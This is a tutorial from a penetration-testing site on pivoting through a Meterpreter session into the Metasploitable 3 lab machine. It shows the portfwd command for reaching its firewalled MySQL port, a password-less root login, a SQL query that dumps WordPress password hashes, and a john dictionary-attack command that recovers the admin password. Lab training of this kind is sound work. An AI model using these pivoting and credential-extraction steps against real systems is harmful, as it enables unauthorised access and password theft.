• Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Facebook Twitter Instagram
Trending
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
  • Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
  • Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Facebook Twitter YouTube Tumblr Instagram Pinterest
Hacking Tutorials
  • Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Hacking Tutorials
You are at:Home » Metasploit Tutorials » Metasploitable 3: Meterpreter Port forwarding
Metasploitable 3 Meterpreter Port forwarding-ft

Metasploitable 3: Meterpreter Port forwarding

0
By Hacking Tutorials on October 16, 2017 Metasploit Tutorials

In this Metasploitable 3 Meterpreter Port forwarding hacking tutorial we will learn how to forward local ports that cannot be accessed remotely. It is very common and good practice to run specific services on a local machine and make them available to that local machine only instead of the full network. On a local network these services are typically administration panels used to configure hardware or software on a single machine which doesn’t need to expose these services to the full network, just like you would not want to expose a local FTP or SMB server to the internet. A good example of a service that doesn’t allow external access by default is MySQL server. MySQL server disables remote access by default upon installation for security reasons and requires the system administrator to explicitly enable remote access in order to allow remote connections. In this tutorial we will be using Meterpreter port forward to tunnel connections to services that cannot be accessed remotely.

To follow this Port forwarding tutorial we assume that you’ve properly installed the Metasploitable 3 machine and have shell access to it. If not, please follow these tutorials first:

  • How to setup Metasploitable 3 on Windows 10
  • Metasploitable 3: Exploiting ManageEngine Desktop Central 9
  • Metasploitable 3: Exploiting HTTP PUT

Port forwarding is the process of forwarding a local port on your system to the remote port you want to access. In this tutorial we will be focusing on port forwarding local ports that cannot be accessed remotely.

Port forwarding: Accessing local ports remotely

The starting point of this tutorial is where the last tutorial has ended: a Meterpreter shell that was gained through exploiting HTTP PUT that allowed us to uploads malicious files to the web root directory.

The starting point of this tutorial is a Meterpreter shell.

When we run ipconfig on the Metasploitable 3 machine we can see there’s a second NIC present with IP 10.0.2.15 as we can see on the following screenshot.

Multiple NICs on Metasploitable 3.

The only problem is that this network is currently not routable from our Kali Linux attack machine. To access this network, we would have to setup a socks4 proxy with proxychains to forward all connections to this subnet. The same technique would also allow us to scan the target network from the perspective of the Metasploitable 3 machine. This would reveal open ports and services that can be accessed locally but not remotely. One example of such service is the MySQL service that is running on port 3306. The initial Nmap scans didn’t reveal this port as it is firewalled because it’s not meant to be accessed remotely. When we run netstat on the Metasploitable 3 machine we can verify that port 3306 is used on the machine and has the service with PID 2224 attached:

Netstat output on Metasploitable 3.

By running tasklist we can verify that MySQL.exe is running on PID 2224:

PID for MySQL.

Now that we know MySQL is running on port 3306 and cannot be accessed remotely, we need to setup the Meterpreter shell in a way that we can tunnel connections over the shell. Since the Meterpreter shell runs locally and is able to access port 3306, we need to forward a local port to the Metasploitable 3 machine over the Meterpreter shell. The easiest way to do this is to use the Meterpreter portfwd module. Before we forward the local port to Metasploitable 3, let’s have a look at the port forwarding functionality in general first to get a better understanding of what it exactly does.

Meterpreter port forwarding

The portforward fucntionality in Meterpreter can be used as a pivoting technique to access networks and machines through the compromised machines that are otherwise inaccessible. The portfwd command will relay TCP connections to and from the connected machines. In the following steps we’ll be making the mySQL server port 3306 available on the local attack machine and forward the traffic on this port to Metasploitable 3. When all is setup, we will be connecting to the localhost on port 3306 with the mysql command line client. The connection to these ports will be forwarded to Metasploitable 3.

We can create the tunnels using the following commands:

portfwd add -l 3306 -p 3306 -r 172.28.128.3

Let’s explain the parameters we’ve used in the command:

  • -l [port]is the local port that will be listening and forwarded to our target. This can be any port on your machine, as long as it’s not already being used by another service.
  • -p [port]is the destination port on our targeting host.
  • -r [target host]is the targeted system’s IP or hostname.

When we’ve successfully ran the commands on the Meterpreter sessions the output saying both ports have been forwarded should look as following:

Forwarding local port 3306 to port 3306 on 172.28.128.3

We can verify that local port 3306 is open on our local machine by running netstat as following:

Port 3306 available on the local attack box.

Next, we can access the MySQL service on Metasploitable 3 by having the MySQL client connect to the localhost as following:

mysql -u root 127.0.0.1

Successful connection to the MySQL server.

Connecting to the MySQL server also revealed a commonly seen security issue; we did not supply a password in the connection command, and we were not prompted to enter one either. As we can see in the screenshot, we are able to list all databases present on the MySQL server, including the WordPress database. Just because a service can be accessed locally only, it doesn’t mean that a password protection layer becomes obsolete. As we can see connections and ports can easily be forwarded when an attacker has shell access to the machine.

Now that we’ve access to the WordPress database, we might as well extract the user password hashes using the following SQL query:

select user_login, user_pass from wp_users;

WordPress password hashes

Running a dictionary attack on the admin hash with john reveals the password for the WordPress admin user:

john –wordlist=/usr/share/wordlists/rockyou.txt wpaccounts

The password for the admin account is sploit.

Hopefully this tutorial was helpful, and you were able to setup the forward successfully in the Meterpreter session.  In this tutorial we’ve learned about port forwarding with Meterpreter. We’ve forwarded connections from a local port on our attack box, over Meterpreter to a local port on the Metasploitable 2 machine. This allowed us to access port 3306 on Metasploitable 3 from a remote machine. In the next and last Metasploitable 3 hacking tutorial we will be attacking the WordPress installation using a few different attack vectors.

Virtual Hacking Labs - Penetration testing lab
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleMetasploitable 3: Exploiting HTTP PUT
Next Article Discovering subdomains with Sublist3r

Related Posts

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

Installing Rogue-jndi on Kali Linux

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

Leave A Reply Cancel Reply

Top Tutorials
By Hacking TutorialsOctober 29, 20220

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

By Hacking TutorialsJanuary 10, 20220

Installing Rogue-jndi on Kali Linux

By Hacking TutorialsDecember 17, 20210

Log4Shell VMware vCenter Server (CVE-2021-44228)

By Hacking TutorialsSeptember 27, 20210

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw

By Hacking TutorialsFebruary 4, 20200

CVE-2019-19781: Citrix ADC RCE vulnerability

By Hacking TutorialsNovember 1, 20188

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

Subscribe

Enter your email address to subscribe to Hacking Tutorials and receive notifications of new tutorials by email.

Join 828 other subscribers
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
Virtual Hacking Labs
Penetration Testin Course and Hacking Labs
Categories
  • Digital Forensics
  • Exploit tutorials
  • General Tutorials
  • Hacking Books
  • Hacking Courses
  • Malware Analysis Tutorials
  • Metasploit Tutorials
  • Networking
  • Pentesting Exchange
  • Scanning Tutorials
  • Web Applications
  • Wifi Hacking Tutorials
Downloads
  • directory_scanner.py (120574 downloads)
  • PEiD-0.95-20081103.zip (111427 downloads)
  • wifi_jammer.py (138172 downloads)
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
Popular Tutorials
By Hacking TutorialsSeptember 1, 2016115

Review: Offensive Security Certified Professional (OSCP)

By Hacking TutorialsApril 18, 201738

Exploiting Eternalblue for shell with Empire & Msfconsole

By Hacking TutorialsMarch 17, 201637

Installing VPN on Kali Linux 2016 Rolling

Featured Downloads
  • directory_scanner.py (120574 downloads)
  • PEiD-0.95-20081103.zip (111427 downloads)
  • wifi_jammer.py (138172 downloads)
© Hacking Tutorials 2022

Type above and press Enter to search. Press Esc to cancel.

Go to mobile version